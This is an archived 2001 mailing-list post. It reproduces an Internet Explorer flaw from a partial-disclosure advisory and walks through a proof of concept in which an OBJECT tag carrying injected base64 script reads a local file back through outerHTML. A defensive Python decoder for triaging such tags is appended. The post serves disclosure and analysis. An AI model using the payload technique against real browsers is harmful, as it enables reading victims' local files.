[Had to resend everything because the original HTML file was rejected. Sorry if anyone gets it twice.]

> NOMEN NESCIO SECURITY ALERT #9000989 666
> Topic: Remote File Execution By Web or Mail: Internet Explorer
> Severity: Critical
> Date: 2001-11-21
>
> There is a critical flaw within the html parser of Internet
> Explorer and its interpretation of certain html tags relative to
> the HKEY_CLASSES_ROOT\htmlfile_FullWindowEmbed key.
>
> In accordance with the new suggested policy of responsible
> disclosure, no exploit and no further details will be made
> available at this time to the general public or the vendor.
>
> In 60 days from publication of this advisory full working
> exploits and details will be made available to the general public
> and vendor at the same time.

I don't want to bother anyone with my opinion on partial disclosure, so here is just what I came up with after two hours of playing with IE.

The advisory mentioned HKEY_CLASSES_ROOT\htmlfile_FullWindowEmbed, so creating an object of that type is probably a good idea...

    <OBJECT ID="myObject" CLASSID="CLSID:25336921-03F9-11CF-8FD0-00AA00686F13">
    </OBJECT>

Ok, alert(myObject.outerHTML); gives us the following:

    <OBJECT id=myObject classid=CLSID:25336921-03F9-11CF-8FD0-00AA00686F13
    data=data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzxwPiZuYnNw
    OzwvcD4= ></OBJECT>

Decoding the Base64 string we get (hex dump):

    20693325F903CF11 8FD000AA00686F13  .i3%.........ho.
    3C703E266E627370 3B3C2F703E         <p>&nbsp;</p>

The first part is a GUID and the second one looks like HTML. We inject the string "<script>document.location.href="file://c:\\test.txt";</script>" into the object using

    <OBJECT ID="myObject" CLASSID="CLSID:25336921-03F9-11CF-8FD0-00AA00686F13"
    data="data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzxzY3JpcHQ+
    ZG9jdW1lbnQubG9jYXRpb24uaHJlZj0iZmlsZTovL2M6XFx0ZXN0LnR4dCI7PC9zY3JpcHQ+">
    </OBJECT>

(There are probably easier ways to do this but I'm not very familiar with IE coding.)
Now to the interesting part. After c:\test.txt is loaded we can still access the data parameter of the object using myObject.outerHTML. This time it contains the Base64 encoded version of c:\\test.txt among other things. So doing an alert(myObject.outerHTML); after the local file is loaded we get:

    <OBJECT id=myObject classid=CLSID:25336921-03F9-11CF-8FD0-00AA00686F13
    data=data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzwhRE9DV
    FlQRSBIVE1MIFBVQkxJQyAiLS8vVzNDLy9EVEQgSFRNTCA0LjAgVHJhbnNpdGlvbmFsLy9
    FTiI+DQo8SFRNTD48SEVBRD4NCjxNRVRBIGh0dHAtZXF1aXY9Q29udGVudC1UeXBlIGNvb
    nRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD13aW5kb3dzLTEyNTIiPjwvSEVBRD4NCjxCT0R
    ZPjxYTVA+aGVsbG8gd29ybGQ8L1hNUD48L0JPRFk+PC9IVE1MPg0K ></OBJECT>

with the Base64 string decoding to:

    20693325F903CF11 8FD000AA00686F13  .i3%.........ho.
    3C21444F43545950 452048544D4C2050  <!DOCTYPE.HTML.P
    55424C494320222D 2F2F5733432F2F44  UBLIC."-//W3C//D
    54442048544D4C20 342E30205472616E  TD.HTML.4.0.Tran
    736974696F6E616C 2F2F454E223E0D0A  sitional//EN">..
    3C48544D4C3E3C48 4541443E0D0A3C4D  <HTML><HEAD>..<M
    4554412068747470 2D65717569763D43  ETA.http-equiv=C
    6F6E74656E742D54 79706520636F6E74  ontent-Type.cont
    656E743D22746578 742F68746D6C3B20  ent="text/html;.
    636861727365743D 77696E646F77732D  charset=windows-
    31323532223E3C2F 484541443E0D0A3C  1252"></HEAD>..<
    424F44593E3C584D 503E68656C6C6F20  BODY><XMP>hello.
    776F726C643C2F58 4D503E3C2F424F44  world</XMP></BOD
    593E3C2F48544D4C 3E0D0A            Y></HTML>..

where "hello world" is the contents of c:\test.txt.

It all boils down to an ordinary DOM circumvention with all the usual implications. The attached exploit reads c:\test.txt and displays it. I've only tested this on Windows 2k pro with IE 5.50 so confirmation on other OSes / versions is welcome.

regards,
Markus Kern
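As an added inspection aid, not part of Markus Kern's post: a Python decoder for the data:application/x-oleobject;base64 blob shown above, which splits off the leading little-endian CLSID (the hex dumps in the post decode to 25336920-03F9-11CF-8FD0-00AA00686F13) and flags embedded HTML that carries script or a file:// reference, the kind of check a mail gateway or an analyst could run over OBJECT tags in suspicious mail. The blob layout (16-byte CLSID, then HTML) is inferred from the post's own hex dumps; the sample inputs are the two attribute values quoted in the post.

```python
import base64
import re
import uuid

# Blob layout inferred from the hex dumps in the post: a 16-byte COM CLSID
# (Data1..Data3 little-endian) followed by the embedded HTML.
_DATA_URI_RE = re.compile(r"^data:application/x-oleobject;base64,(.*)$", re.S)
_OBJECT_DATA_RE = re.compile(
    r'data\s*=\s*"(data:application/x-oleobject;base64,[^"]*)"', re.I)
# Markers that make an embedded document worth a human look.
_ACTIVE_MARKERS = ("<script", "javascript:", "file://", "<object", "<iframe")

def decode_oleobject_data(data_uri):
    """Return (clsid, payload) for a data:application/x-oleobject;base64 URI.

    Whitespace inside the base64 text is dropped first: the attribute arrives
    line-wrapped when mailed or quoted, as it does in the post.
    """
    m = _DATA_URI_RE.match(data_uri.strip())
    if not m:
        raise ValueError("not an x-oleobject base64 data URI")
    raw = base64.b64decode(re.sub(r"\s+", "", m.group(1)), validate=True)
    if len(raw) < 16:
        raise ValueError("blob shorter than a CLSID")
    clsid = str(uuid.UUID(bytes_le=raw[:16])).upper()  # undo COM byte order
    return clsid, raw[16:]

def suspicious_markup(payload):
    """Crude triage: active content or a local-file reference in the embedded HTML?"""
    text = payload.decode("latin-1").lower()
    return any(marker in text for marker in _ACTIVE_MARKERS)

def triage_html(html):
    """Decode every quoted x-oleobject data attribute in a page and flag the odd ones."""
    findings = []
    for uri in _OBJECT_DATA_RE.findall(html):
        try:
            clsid, payload = decode_oleobject_data(uri)
        except ValueError as exc:  # undecodable blob: treat as suspicious, keep the reason
            findings.append({"clsid": None, "payload": b"", "suspicious": True, "error": str(exc)})
            continue
        findings.append({"clsid": clsid, "payload": payload, "suspicious": suspicious_markup(payload)})
    return findings

# Sample inputs: the two attribute values quoted in the post, line wrap kept on purpose.
EMPTY_OBJECT = '<OBJECT data="data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzxwPiZuYnNw OzwvcD4="></OBJECT>'
SCRIPT_OBJECT = ('<OBJECT data="data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzxzY3JpcHQ+ '
                 'ZG9jdW1lbnQubG9jYXRpb24uaHJlZj0iZmlsZTovL2M6XFx0ZXN0LnR4dCI7PC9zY3JpcHQ+"></OBJECT>')
```

Running triage_html(EMPTY_OBJECT + SCRIPT_OBJECT) reports the first object as clean (payload <p>&nbsp;</p>) and the second as suspicious because its payload starts with a <script> element.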
This archive was generated by hypermail 2b30 : Fri Nov 23 2001 - 18:10:29 PST